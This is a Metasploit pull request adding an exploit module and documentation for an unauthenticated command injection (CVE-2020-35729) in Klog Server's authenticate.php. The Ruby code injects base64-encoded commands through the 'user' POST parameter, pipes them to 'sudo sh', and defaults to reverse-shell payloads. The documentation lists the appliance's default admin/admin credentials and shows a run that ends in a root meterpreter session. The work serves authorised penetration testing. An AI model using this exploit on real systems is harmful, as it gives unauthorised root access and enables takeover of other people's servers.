### PR TITLE
Add Klog Server authenticate.php user Unauthenticated Command Injection

### DIFF
--- a/documentation/modules/exploit/linux/http/klog_server_authenticate_user_unauth_command_injection.md
+++ b/documentation/modules/exploit/linux/http/klog_server_authenticate_user_unauth_command_injection.md
@@ -1,0 +1,130 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated command injection vulnerability
+in [Klog Server](https://www.klogserver.com/) versions 2.4.1 and prior.
+    
+The `authenticate.php` file uses the `user` HTTP POST parameter in a call
+to the `shell_exec()` PHP function without appropriate input validation,
+allowing arbitrary command execution as the apache user.
+    
+The sudo configuration permits the apache user to execute any command
+as root without providing a password, resulting in privileged command
+execution as root.
+
+This module has been successfully tested on Klog Server version 2.4.1
+virtual appliance.
+
+Download:
+
+* https://www.klogserver.com/download/ova/2.4.1/klogserver.ova
+
+## Verification Steps
+
+The virtual appliance makes use of a default IP address `10.10.56.51`.
+
+To change the network settings:
+
+1. Login as `admin` - the default console and SSH credentials are `admin` / `admin`.
+1. Select menu option `Ağ ayarları` (1) to view network settings
+
+```
+=== ANA MENÜ ===========================================================
+
+  1. Ağ ayarları
+  2. Sorun giderme
+  3. Bakım
+  4. Cıkış
+
+Çalıştırmak istediğiniz komutun sayısını giriniz: 1
+```
+
+1. Select menu option `Ağ ayarlarını güncelle` (2) to change the current network configuration
+
+```
+--- AĞ AYARLARI --------------------------------------------------------
+
+  1. Ağ ayarlarını göster
+  2. Ağ ayarlarını güncelle
+  3. Ana menüye dön
+
+Çalıştırmak istediğiniz komutun sayısını giriniz: 2
+```
+
+1. Enter the desired IP address, netmask, and gateway
+
+```
+Yeni IP adresi giriniz. Menüye dönmek için Enter'a basınız:
+> 10.1.1.123
+
+  IP adres: 10.1.1.123 
+
+Yeni alt ag maskesini giriniz. Menüye dönmek için Enter'a basınız:
+> 255.255.255.0
+
+  IP adres: 10.1.1.123 
+  Alt ağ maskesi: 255.255.255.0 
+
+Yeni ağ geçidini giriniz. Menüye dönmek için Enter'a basınız:
+> 10.1.1.1
+
+  IP adres: 10.1.1.123 
+  Alt ağ maskesi: 255.255.255.0 
+  Ağ geçidi: 10.1.1.1 
+
+Ayarlar uygulanıyor...
+```
+
+Metasploit:
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection`
+1. Do: `set RHOSTS [IP]`
+1. Do: `set TARGET [TARGET]`
+1. Do: `set PAYLOAD [PAYLOAD]`
+1. Do: `set LHOST [IP]`
+1. Do: `exploit`
+
+## Options
+
+### TARGETURI
+
+The base path of the Klog Server (Default: `/`)
+
+### USE_SUDO
+
+Execute payload as root using `sudo` (Default: `true`)
+
+## Scenarios
+
+### Klog Server version 2.4.1
+
+```
+msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhosts 10.1.1.123
+rhosts => 10.1.1.123
+msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > check
+[+] 10.1.1.123:443 - The target is vulnerable. Response received after 9 seconds.
+msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 0
+target => 0
+msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 10.1.1.105 
+lhost => 10.1.1.105
+msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run
+
+[*] Started reverse TCP handler on 10.1.1.105:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Response received after 11 seconds.
+[*] Sending stage (980808 bytes) to 10.1.1.123
+[*] Meterpreter session 1 opened (10.1.1.105:4444 -> 10.1.1.123:35824) at 2021-02-11 22:59:15 -0500
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+
+meterpreter > getuid
+Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : klogserver.klogserver.com
+OS           : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > 
+```

--- a/modules/exploits/linux/http/klog_server_authenticate_user_unauth_command_injection.rb
+++ b/modules/exploits/linux/http/klog_server_authenticate_user_unauth_command_injection.rb
@@ -1,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Klog Server authenticate.php user Unauthenticated Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection vulnerability
+          in Klog Server versions 2.4.1 and prior.
+
+          The `authenticate.php` file uses the `user` HTTP POST parameter in a call
+          to the `shell_exec()` PHP function without appropriate input validation,
+          allowing arbitrary command execution as the apache user.
+
+          The sudo configuration permits the apache user to execute any command
+          as root without providing a password, resulting in privileged command
+          execution as root.
+
+          This module has been successfully tested on Klog Server version 2.4.1
+          virtual appliance.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+        [
+          'b3kc4t', # Vulnerability discovery and exploit
+          'Metin Yunus Kandemir', # Metasploit module
+          'bcoles', # Metasploit module
+        ],
+        'References' =>
+        [
+          ['CVE', '2020-35729'],
+          ['CWE', '78'],
+          ['EDB', '49366'],
+          ['EDB', '49474'],
+          ['PACKETSTORM', '160798'],
+          ['PACKETSTORM', '161123'],
+          ['URL', 'https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER'],
+          ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
+        ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true,
+            'RPORT' => 443
+          },
+        'Platform' => %w[unix linux],
+        'Targets' => [
+          [
+            'Linux (x86)', {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-12-27',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
+        OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true])
+      ]
+    )
+  end
+
+  def login(user, pass)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'actions', 'authenticate.php'),
+      'vars_post' => {
+        'user' => user,
+        'pswd' => pass
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    user = "#{rand_text_alpha(8..12)}\" & "
+    if datastore['USE_SUDO']
+      user << "echo #{Rex::Text.encode_base64(cmd)}|base64 -d|sudo sh"
+    else
+      user << cmd
+    end
+    user << ' & echo "'
+
+    pass = rand_text_alpha(8..12)
+    login(user, pass)
+  end
+
+  def check
+    sleep = rand(9..11)
+    t1 = Time.now.to_i
+    res = execute_command("sleep #{sleep}")
+    t2 = Time.now.to_i
+
+    unless res
+      return CheckCode::Safe('Connection failed')
+    end
+
+    unless res.code == 302 && res.headers['location'].to_s.include?('login.php?error')
+      return CheckCode::Safe("Unexpected reply (HTTP #{res.code}). Expected redirect (HTTP 302) to login error page.")
+    end
+
+    diff = t2 - t1
+
+    if diff < sleep
+      return CheckCode::Safe("No response within the expected period of time (#{sleep} seconds).")
+    end
+
+    CheckCode::Vulnerable("Response received after #{diff} seconds.")
+  end
+
+  def exploit
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end


### PR DESCRIPTION
## Vulnerable Application

This module exploits an unauthenticated command injection vulnerability
in [Klog Server](https://www.klogserver.com/) versions 2.4.1 and prior.
    
The `authenticate.php` file uses the `user` HTTP POST parameter in a call
to the `shell_exec()` PHP function without appropriate input validation,
allowing arbitrary command execution as the apache user.
    
The sudo configuration permits the apache user to execute any command
as root without providing a password, resulting in privileged command
execution as root.

This module has been successfully tested on Klog Server version 2.4.1
virtual appliance.

Download:

* https://www.klogserver.com/download/ova/2.4.1/klogserver.ova

## Verification Steps

The virtual appliance makes use of a default IP address `10.10.56.51`.

To change the network settings:

1. Login as `admin` - the default console and SSH credentials are `admin` / `admin`.
1. Select menu option `Ağ ayarları` (1) to view network settings

```
=== ANA MENÜ ===========================================================

  1. Ağ ayarları
  2. Sorun giderme
  3. Bakım
  4. Cıkış

Çalıştırmak istediğiniz komutun sayısını giriniz: 1
```

1. Select menu option `Ağ ayarlarını güncelle` (2) to change the current network configuration

```
--- AĞ AYARLARI --------------------------------------------------------

  1. Ağ ayarlarını göster
  2. Ağ ayarlarını güncelle
  3. Ana menüye dön

Çalıştırmak istediğiniz komutun sayısını giriniz: 2
```

1. Enter the desired IP address, netmask, and gateway

```
Yeni IP adresi giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.123

  IP adres: 10.1.1.123 

Yeni alt ag maskesini giriniz. Menüye dönmek için Enter'a basınız:
> 255.255.255.0

  IP adres: 10.1.1.123 
  Alt ağ maskesi: 255.255.255.0 

Yeni ağ geçidini giriniz. Menüye dönmek için Enter'a basınız:
> 10.1.1.1

  IP adres: 10.1.1.123 
  Alt ağ maskesi: 255.255.255.0 
  Ağ geçidi: 10.1.1.1 

Ayarlar uygulanıyor...
```

Metasploit:

1. Start msfconsole
1. Do: `use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection`
1. Do: `set RHOSTS [IP]`
1. Do: `set TARGET [TARGET]`
1. Do: `set PAYLOAD [PAYLOAD]`
1. Do: `set LHOST [IP]`
1. Do: `exploit`

## Options

### TARGETURI

The base path of the Klog Server (Default: `/`)

### USE_SUDO

Execute payload as root using `sudo` (Default: `true`)

## Scenarios

### Klog Server version 2.4.1

```
msf6 > use exploit/linux/http/klog_server_authenticate_user_unauth_command_injection 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set rhosts 10.1.1.123
rhosts => 10.1.1.123
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > check
[+] 10.1.1.123:443 - The target is vulnerable. Response received after 9 seconds.
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set target 0
target => 0
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > set lhost 10.1.1.105 
lhost => 10.1.1.105
msf6 exploit(linux/http/klog_server_authenticate_user_unauth_command_injection) > run

[*] Started reverse TCP handler on 10.1.1.105:4444 
[*] Sending stage (980808 bytes) to 10.1.1.123
[*] Meterpreter session 1 opened (10.1.1.105:4444 -> 10.1.1.123:35824) at 2021-02-11 22:59:15 -0500
[*] Command Stager progress - 100.00% done (773/773 bytes)

meterpreter > getuid
Server username: root @ klogserver.klogserver.com (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : klogserver.klogserver.com
OS           : CentOS 7.3.1611 (Linux 3.10.0-514.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
